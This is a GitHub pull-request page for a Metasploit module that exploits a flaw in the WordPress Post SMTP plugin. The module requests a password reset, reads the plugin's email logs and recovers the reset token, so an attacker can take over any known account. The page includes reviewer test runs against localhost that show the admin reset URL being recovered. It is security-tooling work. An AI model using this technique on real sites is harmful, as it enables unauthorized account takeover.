New Exploit: Wordpress Plugin Post SMTP Account Takeover #19596
Merged
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jvoisin
reviewed
Oct 30, 2024
| ) | ||
| register_options( | ||
| [ | ||
| OptString.new('USERNAME', [true, 'Username to password reset', '']), |
There was a problem hiding this comment.
maybe, but you may want to reset someone else's
sjanusz-r7
reviewed
Oct 31, 2024
documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
Outdated
Show resolved
Hide resolved
jheysel-r7
added
docs
rn-modules
jheysel-r7
reviewed
Nov 28, 2024
There was a problem hiding this comment.
Hey @h00die, module looks great. Thanks for updating the mixin with reset_user_password method. A couple minor comments, testing was as expected 👍
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
rport => 5555
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Succesfully created token: SyCnSdOlf8d2LR
[*] Requesting logs
[*] Requesting email content from logs for ID 1
[+] Full text of log saved to: /Users/jheysel/.msf4/loot/20241127125902_default_127.0.0.1_wordpress.post_s_557880.txt
[+] Reset URL: http://localhost:5555/wp-login.php?action=rp&key=g3YAEiUz3n6G6BJqonCl&login=admin&wp_lang=en_US
[*] Auxiliary module execution completed
documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
Show resolved
Hide resolved
documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
Outdated
Show resolved
Hide resolved
documentation/modules/auxiliary/admin/http/wp_post_smtp_acct_takeover.md
Outdated
Show resolved
Hide resolved
|
re-tested with changes, still working for me! |
jheysel-r7
reviewed
Nov 29, 2024
There was a problem hiding this comment.
Thanks for making those changes! Also working for me after retesting, landing now.
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set rport 5555
rport => 5555
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > set username admin
username => admin
msf6 auxiliary(admin/http/wp_post_smtp_acct_takeover) > run
[*] Running module against 127.0.0.1
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[+] Succesfully created token: FeYJuLfWieI4KAb
[*] Requesting logs
[*] Requesting email content from logs for ID 6
[+] Full text of log saved to: /Users/jheysel/.msf4/loot/20241129085518_default_127.0.0.1_wordpress.post_s_474190.txt
[+] Reset URL: http://localhost:5555/wp-login.php?action=rp&key=D8LVH285Ez5NqNSp1vag&login=admin&wp_lang=en_US
[*] Auxiliary module execution completed
jheysel-r7
approved these changes
Nov 29, 2024
Release NotesThe POST SMTP Mailer – Email log, Delivery Failure Notifications and Best Mail SMTP for WordPress, plugin for WordPress is vulnerable to unauthorized access of data and modification of data due to a type juggling issue on the connect-app REST endpoint in all versions up to, and including, 2.8.7. This adds an exploit module which allows an attacker to reset the password of any known user on the system. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
Fixes #18705
This PR adds a new module targeting the wordpress plugin post smtp plugin. The exploit is to request a password reset on a user, then check the SMTP logs to steal the token for resetting that user's password. Pretty simple, but fun.
Documentation will be done tomorrow.
Verification